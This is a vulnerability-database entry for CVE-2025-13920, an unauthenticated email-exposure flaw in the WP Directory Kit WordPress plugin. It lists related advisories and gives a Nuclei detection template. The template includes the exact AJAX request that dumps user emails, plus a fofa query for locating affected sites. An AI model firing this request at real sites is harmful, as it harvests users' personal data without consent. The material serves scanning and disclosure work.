| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2025-13920 | 24 Jan 202612:27 | – | attackerkb | |
| CVE-2025-13920 | 24 Jan 202615:59 | – | circl | |
| WordPress plugin WP Directory Kit 信息泄露漏洞 | 24 Jan 202600:00 | – | cnnvd | |
| WordPress Plugin WP Directory Kit Information Disclosure Vulnerability | 30 Jan 202600:00 | – | cnvd | |
| CVE-2025-13920 | 24 Jan 202612:27 | – | cve | |
| CVE-2025-13920 WP Directory Kit <= 1.4.9 - Unauthenticated Email Exposure via wdk_public_action | 24 Jan 202612:27 | – | cvelist | |
| EUVD-2026-4542 | 24 Jan 202612:27 | – | euvd | |
| CVE-2025-13920 | 24 Jan 202613:15 | – | nvd | |
| WordPress WP Directory Kit plugin <= 1.4.9 - Unauthenticated Email Exposure via wdk_public_action vulnerability | 27 Jan 202603:01 | – | patchstack | |
| PT-2026-4615 | 24 Jan 202600:00 | – | ptsecurity |
id: CVE-2025-13920
info:
name: WP Directory Kit < 1.5.0 - Unauthenticated Email Exposure
author: 0x_Akoko
severity: medium
description: |
WP Directory Kit plugin for WordPress <= 1.4.9 contains a sensitive information exposure caused by improper access control in wdk_public_action AJAX handler, letting unauthenticated attackers extract email addresses of users with Directory Kit-specific roles.
impact: |
Unauthenticated attackers can extract email addresses of users with specific roles, leading to privacy breaches.
remediation: |
Update to the latest version beyond 1.4.9.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8905dcc7-d3c8-4ae8-818c-df3e6ed2ad9c
- https://nvd.nist.gov/vuln/detail/CVE-2025-13920
- https://wordpress.org/plugins/wpdirectorykit/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.2
cve-id: CVE-2025-13920
epss-score: 0.00669
epss-percentile: 0.4749
cwe-id: CWE-862
metadata:
verified: true
max-request: 1
vendor: wpdirectorykit
product: wpdirectorykit
fofa-query: body="/wp-content/plugins/wpdirectorykit/"
tags: cve,cve2025,wordpress,wp-plugin,wpdirectorykit,exposure,unauth,vkev
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wdk_public_action&page=wdk_frontendajax&function=select_2_ajax&table=user_m&print_column=user_email&key_column=ID
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "\"success\":true", "\"text\"", "@")'
condition: and
# digest: 4a0a0047304502202d8affcb4427cb1624984304a3609e4b679dea55069a3e61242eadebf66a28f8022100cfbc4be6e40ea30358966a9e76e78ad7b6db8db9d07ebfc1ba9ea92d6417348a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation